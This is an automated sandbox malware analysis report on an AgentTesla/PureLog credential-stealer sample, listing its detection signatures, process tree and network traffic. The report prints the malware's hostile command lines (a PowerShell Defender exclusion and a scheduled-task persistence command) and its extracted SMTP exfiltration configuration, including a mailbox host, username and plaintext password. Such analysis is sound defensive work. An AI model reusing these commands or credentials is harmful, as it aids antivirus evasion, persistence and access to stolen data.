Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Overview

General Information

Sample name:SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Analysis ID:1398430
MD5:6e7df9fae35366f13f6d83e037321608
SHA1:1a3231720688f17ad0ed86c633ff02a9777b5753
SHA256:232dda5f15f635e041afce6e34f17ba284380475a14232e85856065bdd78f0be
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe (PID: 6552 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe MD5: 6E7DF9FAE35366F13F6D83E037321608)
    • powershell.exe (PID: 984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7408 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6812 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7264 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • jYRIGnZlROed.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe MD5: 6E7DF9FAE35366F13F6D83E037321608)
    • schtasks.exe (PID: 7584 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 25 entries
              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ea6c4.8.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      9.2.jYRIGnZlROed.exe.31ae900.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 41 entries

                        Networking

                        barindex
                        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7264, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ProcessId: 984, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7264, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ProcessId: 984, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ParentImage: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ParentProcessId: 7360, ParentProcessName: jYRIGnZlROed.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp, ProcessId: 7584, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, ProcessId: 6812, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ProcessId: 984, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp, ProcessId: 6812, ProcessName: schtasks.exe
                        Timestamp:02/25/24-21:27:00.324583
                        SID:2851779
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/25/24-21:27:00.324583
                        SID:2855542
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/25/24-21:27:00.324583
                        SID:2855245
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/25/24-21:27:00.324583
                        SID:2840032
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/25/24-21:27:00.324334
                        SID:2030171
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeReversingLabs: Detection: 28%
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeVirustotal: Detection: 41%Perma Link
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeReversingLabs: Detection: 28%
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeVirustotal: Detection: 41%Perma Link
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeJoe Sandbox ML: detected
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeJoe Sandbox ML: detected
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewIP Address: 50.87.139.143 50.87.139.143
                        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.61.11.39
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.61.11.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.61.11.39
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.61.11.8
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ipify.org
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                        Source: MSBuild.exe, 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elec-qatar.com
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1662329813.0000000003068000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1695168637.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
